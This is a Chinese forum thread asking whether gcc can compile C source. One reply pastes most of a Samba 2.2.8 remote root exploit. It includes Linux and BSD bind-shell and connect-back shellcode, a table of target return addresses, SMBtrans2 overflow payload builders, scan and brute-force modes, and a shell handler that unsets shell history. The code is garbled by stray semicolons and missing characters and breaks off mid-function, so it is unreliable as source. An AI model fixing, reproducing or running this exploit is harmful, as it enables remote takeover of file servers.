gcc可以编译C的原程序吗？

×纯※雪 2022-10-08 01:28:57

可以

陪我终i 2022-10-08 01:28:57

#include <stdio.h>;
#include <string.h>;
#include <stdlib.h>;
#include <netdb.h>;
#include <errno.h>;
#include <fcntl.h>;
#include <signal.h>;
#include <string.h>;
#include <unistd.h>;
#include <sys/select.h>;
#include <sys/socket.h>;
#include <sys/types.h>;
#include <sys/time.h>;
#include <sys/wait.h>;
#include <netinet/in.h>;
#include <arpa/inet.h>;

typedef struct {
unsigned char type;
unsigned char flags;
unsigned short length;
} NETBIOS_HEADER;

typedef struct {
unsigned char protocol[4];
unsigned char command;
unsigned short status;
unsigned char reserved;
unsigned char flags;
unsigned short flags2;
unsigned char pad[12];
unsigned short tid;
unsigned short pid;
unsigned short uid;
unsigned short mid;
} SMB_HEADER;

int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

char
linux_bindcode[] =
      "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
      "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
      "\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
      "\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
      "\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
      "\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
      "\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
      "\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
      "\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
      "\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
      "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
      "\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
      "\x89\xf3\xb0\x06\xcd\x80\xeb\x99";

char
bsd_bindcode[] =
"\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
"\x61\xcd\x80\x89\xc7\x31\xc0\x50\x50\x50\x66\x68\xb0\xef\xb7\x02"
"\x66\x53\x89\xe1\x31\xdb\xb3\x10\x53\x51\x57\x50\xb0\x68\xcd\x80"
"\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x50\x57"
"\x50\xb0\x6a\xcd\x80\x31\xc0\x31\xdb\x50\x89\xe1\xb3\x01\x53\x89"
"\xe2\x50\x51\x52\xb3\x14\x53\x50\xb0\x2e\xcd\x80\x31\xc0\x50\x50"
"\x57\x50\xb0\x1e\xcd\x80\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80"
"\x39\xc3\x75\x44\x31\xc0\x57\x50\xb0\x06\xcd\x80\x31\xc0\x50\x56"
"\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x56\x50\xb0\x5a\xcd"
"\x80\x31\xc0\x43\x53\x56\x50\xb0\x5a\xcd\x80\x31\xc0\x50\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\x50\xb0\x3b"
"\xcd\x80\x31\xc0\xb0\x01\xcd\x80\x31\xc0\x56\x50\xb0\x06\xcd\x80"
"\xeb\x9a";

char
linux_connect_back[] =
"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
"\x68\x41\x42\x43\x44\x66\x68\xb0\xef\xb1\x02\x66\x51\x89\xe7\xb3"
"\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
"\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
"\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
"\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
"\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
"\x01\xcd\x80";

char
bsd_connect_back[] =
      "\x31\xc0\x31\xdb\x53\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x54\xb0"
      "\x61\xcd\x80\x31\xd2\x52\x52\x68\x41\x41\x41\x41\x66\x68\xb0\xef"
      "\xb7\x02\x66\x53\x89\xe1\xb2\x10\x52\x51\x50\x52\x89\xc2\x31\xc0"
      "\xb0\x62\xcd\x80\x31\xdb\x39\xc3\x74\x06\x31\xc0\xb0\x01\xcd\x80"
      "\x31\xc0\x50\x52\x50\xb0\x5a\xcd\x80\x31\xc0\x31\xdb\x43\x53\x52"
      "\x50\xb0\x5a\xcd\x80\x31\xc0\x43\x53\x52\x50\xb0\x5a\xcd\x80\x31"
      "\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54"
      "\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

struct {
char *type;
unsigned long ret;
char *shellcode;
int os_type; /* 0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD non-exec stack */

} targets[] = {
{ "samba-2.2.x - Debian 3.0          ", 0xbffffea2, linux_bindcode, 0 },
{ "samba-2.2.x - Gentoo 1.4.x       ", 0xbfffe890, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 8.x       ", 0xbffff6a0, linux_bindcode, 0 },
{ "samba-2.2.x - Mandrake 9.0       ", 0xbfffe638, linux_bindcode, 0 },
      { "samba-2.2.x - Redhat 9.0          ", 0xbffff7cc, linux_bindcode, 0 },
      { "samba-2.2.x - Redhat 8.0          ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 7.x          ", 0xbffff310, linux_bindcode, 0 },
{ "samba-2.2.x - Redhat 6.x          ", 0xbffff2f0, linux_bindcode, 0 },
{ "samba-2.2.x - Slackware 9.0       ", 0xbffff574, linux_bindcode, 0 },
{ "samba-2.2.x - Slackware 8.x       ", 0xbffff574, linux_bindcode, 0 },
{ "samba-2.2.x - SuSE 7.x          ", 0xbffffbe6, linux_bindcode,    0 },
{ "samba-2.2.x - SuSE 8.x          ", 0xbffff8f8, linux_bindcode, 0 },
{ "samba-2.2.x - FreeBSD 5.0       ", 0xbfbff374, bsd_bindcode,      1 },
{ "samba-2.2.x - FreeBSD 4.x       ", 0xbfbff374, bsd_bindcode, 1 },
{ "samba-2.2.x - NetBSD 1.6          ", 0xbfbfd5d0, bsd_bindcode, 1 },
{ "samba-2.2.x - NetBSD 1.5          ", 0xbfbfd520, bsd_bindcode,    1 },
{ "samba-2.2.x - OpenBSD 3.2       ", 0x00159198, bsd_bindcode, 2 },
{ "samba-2.2.8 - OpenBSD 3.2 (package)", 0x001dd258, bsd_bindcode,    2 },
{ "samba-2.2.7 - OpenBSD 3.2 (package)", 0x001d9230, bsd_bindcode,    2 },
{ "samba-2.2.5 - OpenBSD 3.2 (package)", 0x001d6170, bsd_bindcode,    2 },
      { "Crash (All platforms)             ", 0xbade5dee, linux_bindcode, 0 },
};

void shell();
void usage();
void handler();

int is_samba(char *ip, unsigned long time_out);
int Connect(int fd, char *ip, unsigned int port, unsigned int time_out);
int read_timer(int fd, unsigned int time_out);
int write_timer(int fd, unsigned int time_out);
int start_session(int sock);
int exploit_normal(int sock, unsigned long ret, char *shellcode);
int exploit_openbsd32(int sock, unsigned long ret, char *shellcode);

void
usage(char *prog)
{
      fprintf(stderr, "Usage: %s [-bBcCdfprsStv] [host]\n\n"
        "-b <platform>; bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)\n"
"-B <step>;    bruteforce steps (default = 300)\n"
"-c <ip address>; connectback ip address\n"
"-C <max childs>; max childs for scan/bruteforce mode (default = 40)\n"
"-d <delay>;    bruteforce/scanmode delay in micro seconds (default = 100000)\n"
"-f             force\n"
        "-p <port>;    port to attack (default = 139)\n"
"-r <ret>;       return address\n"
"-s             scan mode (random)\n"
"-S <network>; scan mode\n"
"-t <type>;    presets (0 for a list)\n"
"-v             verbose mode\n\n", prog);

      exit(1);
}

int
is_samba(char *ip, unsigned long time_out)
{
char
nbtname[]= /* netbios name packet */
{
        0x80,0xf0,0x00,0x10,0x00,0x01,0x00,0x00,
        0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,
        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,
        0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,
        0x00,0x01
};

unsigned char recv_buf[1024];
unsigned char *ptr;

int i = 0;
int s = 0;

unsigned int total = 0;

if ((s = socket(PF_INET, SOCK_DGRAM, 17)) <= 0) return -1;

if(Connect(s, ip, 137, time_out) == -1) {
close(s);
return -1;
}

memset(recv_buf, 0x00, sizeof(recv_buf));

if(write_timer(s, time_out) == 1) {
if (write(s, nbtname, sizeof(nbtname)) <= 0) {
close(s);
return -1;
}
}

if (read_timer(s, time_out) == 1) {
if (read(s, recv_buf, sizeof(recv_buf)) <= 0) {
close(s);
return -1;
}

        ptr = recv_buf + 57;
total = *(ptr - 1); /* max names */

        while(ptr < recv_buf + sizeof(recv_buf)) {
                 ptr += 18;
if (i == total) {

ptr -= 19;

if ( *(ptr + 1) == 0x00 && *(ptr + 2) == 0x00 && *(ptr + 3) == 0x00 &&
*(ptr + 4) == 0x00 && *(ptr + 5) == 0x00 && *(ptr + 6) == 0x00) {
close(s);
return 0;
}

close(s);
return 1;
}

i++;
}

}
close(s);
return -1;
}

int
Connect(int fd, char *ip, unsigned int port, unsigned int time_out)
{
/* ripped from no1 */

int                   flags;
int                   select_status;
fd_set                connect_read, connect_write;
struct timeval          timeout;
int                   getsockopt_length = 0;
int                   getsockopt_error = 0;
struct sockaddr_in    server;
bzero(&server, sizeof(server));
server.sin_family = AF_INET;
inet_pton(AF_INET, ip, &server.sin_addr);
server.sin_port = htons(port);

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return -1;
    }

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return -1;
    }

timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&connect_read);
FD_ZERO(&connect_write);
FD_SET(fd, &connect_read);
FD_SET(fd, &connect_write);

if((connect(fd, (struct sockaddr *) &server, sizeof(server))) < 0) {
if(errno != EINPROGRESS) {
      close(fd);
      return -1;
}
    }
else {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
      return -1;
}

return 1;

}

select_status = select(fd + 1, &connect_read, &connect_write, NULL, &timeout);

if(select_status == 0) {
close(fd);
return -1;

}

if(select_status == -1) {
close(fd);
return -1;
}

if(FD_ISSET(fd, &connect_read) || FD_ISSET(fd, &connect_write)) {
if(FD_ISSET(fd, &connect_read) && FD_ISSET(fd, &connect_write)) {
getsockopt_length = sizeof(getsockopt_error);

if(getsockopt(fd, SOL_SOCKET, SO_ERROR, &getsockopt_error, &getsockopt_length) < 0) {
errno = ETIMEDOUT;
close(fd);
return -1;
}

if(getsockopt_error == 0) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}

else {
errno = getsockopt_error;
close(fd);
return (-1);
}

}
}
else {
close(fd);
return 1;
}

if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}

int
read_timer(int fd, unsigned int time_out)
{

/* ripped from no1 */

int                   flags;
int                   select_status;
fd_set                fdread;
struct timeval          timeout;

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}

timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdread);
FD_SET(fd, &fdread);
select_status = select(fd + 1, &fdread, NULL, NULL, &timeout);

if(select_status == 0) {
close(fd);
return (-1);
}

if(select_status == -1) {
close(fd);
return (-1);
}

if(FD_ISSET(fd, &fdread)) {

    if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
      return -1;
}

return 1;

}
else {
close(fd);
return 1;

}
}

int
write_timer(int fd, unsigned int time_out)
{

/* ripped from no1 */

int                   flags;
int                   select_status;
fd_set                fdwrite;
struct timeval          timeout;

if((flags = fcntl(fd, F_GETFL, 0)) < 0) {
close(fd);
return (-1);
}

if(fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0) {
close(fd);
return (-1);
}

timeout.tv_sec = time_out;
timeout.tv_usec = 0;
FD_ZERO(&fdwrite);
FD_SET(fd, &fdwrite);

select_status = select(fd + 1, NULL, &fdwrite, NULL, &timeout);

if(select_status == 0) {
close(fd);
return -1;
}

if(select_status == -1) {
close(fd);
return -1;
}

if(FD_ISSET(fd, &fdwrite)) {
if(fcntl(fd, F_SETFL, flags) < 0) {
close(fd);
return -1;
}
return 1;
}
else {
close(fd);
return -1;
}
}

void
shell(int sock)
{
      fd_set  fd_read;
      char buff[1024], *cmd="unset HISTFILE; echo \"*** JE MOET JE MUIL HOUWE\";uname -a;id;\n";
      int n;

      FD_ZERO(&fd_read);
      FD_SET(sock, &fd_read);
      FD_SET(0, &fd_read);

send(sock, cmd, strlen(cmd), 0);

      while(1) {
            FD_SET(sock,&fd_read);
            FD_SET(0,&fd_read);

if (select(FD_SETSIZE, &fd_read, NULL, NULL, NULL) < 0 ) break;

if (FD_ISSET(sock, &fd_read)) {

                     if((n = recv(sock, buff, sizeof(buff), 0)) < 0){
                              fprintf(stderr, "EOF\n";
                              exit(2);
                     }

if (write(1, buff, n) < 0) break;
}

if (FD_ISSET(0, &fd_read)) {

                     if((n = read(0, buff, sizeof(buff))) < 0){
                              fprintf(stderr, "EOF\n";
                              exit(2);
                     }

if (send(sock, buff, n, 0) < 0) break;
}

usleep(10);
}

fprintf(stderr, "Connection lost.\n\n";
exit(0);
}

void
handler()
{
int sock = 0;
int i = 0;
OWNED = 1;

for (i = 0; i < 100; i++)
if (childs != 0xffffffff) waitpid(childs, NULL, 0);

      if ((sock = socket(AF_INET, SOCK_STREAM, 6)) < 0) {
            close(sock);
exit(1);
      }
      if(Connect(sock, (char *)inet_ntoa(addr1.sin_addr), 45295, 2) != -1) {
            fprintf(stdout, "+ Worked!\n"
                              "--------------------------------------------------------------\n";
            shell(sock);
            close(sock);
      }
}
int
start_session(int sock)
{
char buffer[1000];
char response[4096];
char session_data1[] = "\x00\xff\x00\x00\x00\x00\x20\x02\x00\x01\x00\x00\x00\x00";
      char session_data2[] = "\x00\x00\x00\x00\x5c\x5c\x69\x70\x63\x24\x25\x6e\x6f\x62\x6f\x64\x79"
                  "\x00\x00\x00\x00\x00\x00\x00\x49\x50\x43\x24";

      NETBIOS_HEADER  *netbiosheader;
      SMB_HEADER    *smbheader;
memset(buffer, 0x00, sizeof(buffer));
      netbiosheader = (NETBIOS_HEADER *)buffer;
      smbheader    = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
      netbiosheader->;type = 0x00;       /* session message */
      netbiosheader->;flags = 0x00;
      netbiosheader->;length = htons(0x2E);
      smbheader->;protocol[0] = 0xFF;
      smbheader->;protocol[1] = 'S';
      smbheader->;protocol[2] = 'M';
      smbheader->;protocol[3] = 'B';
      smbheader->;command = 0x73;       /* session setup */
      smbheader->;flags = 0x08;       /* caseless pathnames */
      smbheader->;flags2 = 0x01;       /* long filenames supported */
      smbheader->;pid = getpid() & 0xFFFF;
smbheader->;uid       = 100;
      smbheader->;mid = 0x01;
      memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data1, sizeof(session_data1) - 1);
if(write_timer(sock, 3) == 1)
if (send(sock, buffer, 50, 0) < 0) return -1;
memset(response, 0x00, sizeof(response));
if (read_timer(sock, 3) == 1)
if (read(sock, response, sizeof(response) - 1) < 0) return -1;

      netbiosheader = (NETBIOS_HEADER *)response;
      smbheader    = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
if (netbiosheader->;type != 0x00) fprintf(stderr, "+ Recieved a non session message\n";
      netbiosheader = (NETBIOS_HEADER *)buffer;
      smbheader    = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
      memset(buffer, 0x00, sizeof(buffer));
      netbiosheader->;type    = 0x00;       /* session message */
      netbiosheader->;flags = 0x00;
      netbiosheader->;length = htons(0x3C);
      smbheader->;protocol[0]  = 0xFF;
      smbheader->;protocol[1]  = 'S';
      smbheader->;protocol[2]  = 'M';
      smbheader->;protocol[3]  = 'B';
      smbheader->;command    = 0x70;       /* start connection */
smbheader->;pid       = getpid() & 0xFFFF;
smbheader->;tid = 0x00;
      smbheader->;uid       = 100;
memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER), session_data2, sizeof(session_data2) - 1);
      if(write_timer(sock, 3) == 1)
            if (send(sock, buffer, 64, 0) < 0) return -1;
      memset(response, 0x00, sizeof(response));
      if (read_timer(sock, 3) == 1)
            if (read(sock, response, sizeof(response) - 1) < 0) return -1;
      netbiosheader = (NETBIOS_HEADER *)response;
      smbheader    = (SMB_HEADER *)(response + sizeof(NETBIOS_HEADER));
      if (netbiosheader->;type != 0x00) return -1;
      return 0;
}
int
exploit_normal(int sock, unsigned long ret, char *shellcode)
{
char buffer[4000];
      char exploit_data[] =
            "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x90";
int i = 0;
unsigned long dummy = ret - 0x90;
      NETBIOS_HEADER  *netbiosheader;
      SMB_HEADER    *smbheader;
memset(buffer, 0x00, sizeof(buffer));
      netbiosheader = (NETBIOS_HEADER *)buffer;
      smbheader    = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
      netbiosheader->;type          = 0x00;       /* session message */
      netbiosheader->;flags          = 0x04;
      netbiosheader->;length          = htons(2096);
      smbheader->;protocol[0]       = 0xFF;
      smbheader->;protocol[1]       = 'S';
      smbheader->;protocol[2]       = 'M';
      smbheader->;protocol[3]       = 'B';
      smbheader->;command             = 0x32;       /* SMBtrans2 */
smbheader->;tid = 0x01;
      smbheader->;uid                = 100;
memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
buffer[1096] = 0xEB;
buffer[1097] = 0x70;
for (i = 0; i < 4 * 24; i += {
memcpy(buffer + 1099 + i, &dummy, 4);
memcpy(buffer + 1103 + i, &ret, 4);
}
      memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
exploit_data, sizeof(exploit_data) - 1);
memcpy(buffer + 1800, shellcode, strlen(shellcode));
if(write_timer(sock, 3) == 1) {
if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
return 0;
}
return -1;
}
int
exploit_openbsd32(int sock, unsigned long ret, char *shellcode)
{
      char buffer[4000];
      char exploit_data[] =
            "\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
            "\x00\x00\x00\x90";
      int i = 0;
      unsigned long dummy = ret - 0x30;
      NETBIOS_HEADER  *netbiosheader;
      SMB_HEADER    *smbheader;
      memset(buffer, 0x00, sizeof(buffer));
      netbiosheader = (NETBIOS_HEADER *)buffer;
      smbheader    = (SMB_HEADER *)(buffer + sizeof(NETBIOS_HEADER));
      netbiosheader->;type          = 0x00;       /* session message */
      netbiosheader->;flags          = 0x04;
      netbiosheader->;length          = htons(2096);
      smbheader->;protocol[0]       = 0xFF;
      smbheader->;protocol[1]       = 'S';
      smbheader->;protocol[2]       = 'M';
      smbheader->;protocol[3]       = 'B';
      smbheader->;command             = 0x32;       /* SMBtrans2 */
      smbheader->;tid                = 0x01;
      smbheader->;uid                = 100;
      memset(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER) + sizeof(exploit_data), 0x90, 3000);
for (i = 0; i < 4 * 24; i += 4)
memcpy(buffer + 1131 + i, &dummy, 4);

      memcpy(buffer + 1127, &ret,    4);
      memcpy(buffer + sizeof(NETBIOS_HEADER) + sizeof(SMB_HEADER),
                     exploit_data, sizeof(exploit_data) - 1);
      memcpy(buffer + 1100 - strlen(shellcode), shellcode, strlen(shellcode));
      if(write_timer(sock, 3) == 1) {
            if (send(sock, buffer, sizeof(buffer) - 1, 0) < 0) return -1;
            return 0;
      }
      return -1;
}
int
main (int argc,char *argv[])
{
char *shellcode = NULL;
char scan_ip[256];
int brute = -1;
int connectback = 0;
int force = 0;
int i = 0;
int ip1 = 0;
int ip2 = 0;
int ip3 = 0;
int ip4 = 0;
int opt = 0;
int port = 139;
int random = 0;
int scan = 0;
int sock = 0;
int sock2 = 0;
int status = 0;
int type = 0;
int verbose = 0;
unsigned long BRUTE_DELAY = 100000;
unsigned long ret = 0x0;
unsigned long MAX_CHILDS = 40;
unsigned long STEPS = 300;
      struct hostent *he;
fprintf(stdout, "samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)\n"
"--------------------------------------------------------------\n";

      while((opt = getopt(argc,argv,"b:B:c:C:d:fp:r:sS:t:v") !=EOF) {
            switch(opt)
{
case 'b':
brute = atoi(optarg);
if ((brute < 0) || (brute >; 3)) {
fprintf(stderr, "Invalid platform.\n\n";
return -1;
}
break;
case 'B':
STEPS = atoi(optarg);
if (STEPS == 0) STEPS++;
break;
case 'c':
sscanf(optarg, "%d.%d.%d.%d", &ip1, &ip2, &ip3, &ip4);
connectback = 1;
if (ip1 == 0 || ip2 == 0 || ip3 == 0 || ip4 == 0) {
fprintf(stderr, "Invalid IP address.\n\n";
return -1;
}
linux_connect_back[33] = ip1; bsd_connect_back[24] = ip1;
linux_connect_back[34] = ip2; bsd_connect_back[25] = ip2;
linux_connect_back[35] = ip3; bsd_connect_back[26] = ip3;
linux_connect_back[36] = ip4; bsd_connect_back[27] = ip4;

break;
case 'C':
MAX_CHILDS = atoi(optarg);
if (MAX_CHILDS == 0) {
fprintf(stderr, "Invalid number of childs.\n";
return -1;
}
if (MAX_CHILDS >; 99) {
fprintf(stderr, "Too many childs, using 99. \n");
MAX_CHILDS = 99;
}
break;
case 'd':
BRUTE_DELAY = atoi(optarg);
break;
case 'f':
force = 1;
break;
                     case 'p':
                              port = atoi(optarg);
                              if ((port <= 0) || (port >; 65535)) {
                                    fprintf(stderr, "Invalid port.\n\n");
                                    return -1;
                              }
                              break;
case 'r':
ret = strtoul(optarg, &optarg, 16);
break;
case 's':
random = 1;
scan = 1;
break;
case 'S':
random = 0;
scan = 1;
sscanf(optarg, "%d.%d.%d", &ip1, &ip2, &ip3);
ip3--;
break;
                     case 't':
                              type = atoi(optarg);
                              if (type == 0 || type >; sizeof(targets) / 16) {
                                    for(i = 0; i < sizeof(targets) / 16; i++)

回复收藏 0

面犯桃花 2022-10-08 01:28:57

这段程序我怎么就不能编译呢？谁能编译？

回复收藏 0

gcc可以编译C的原程序吗？

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

评论（3）

关于作者

相关话题

热门标签

推荐作者

wanghao

蓝天

handsomedeng

仙女

石海龙

dianjvnan

友情链接

gcc可以编译C的原程序吗？

如果你对这篇内容有疑问，欢迎到本站社区发帖提问 参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。

发布评论

评论（3）

关于作者

相关话题

热门标签

推荐作者

wanghao

蓝天

handsomedeng

仙女

石海龙

dianjvnan

友情链接

如果你对这篇内容有疑问，欢迎到本站社区发帖提问参与讨论，获取更多帮助，或者扫码二维码加入 Web 技术交流群。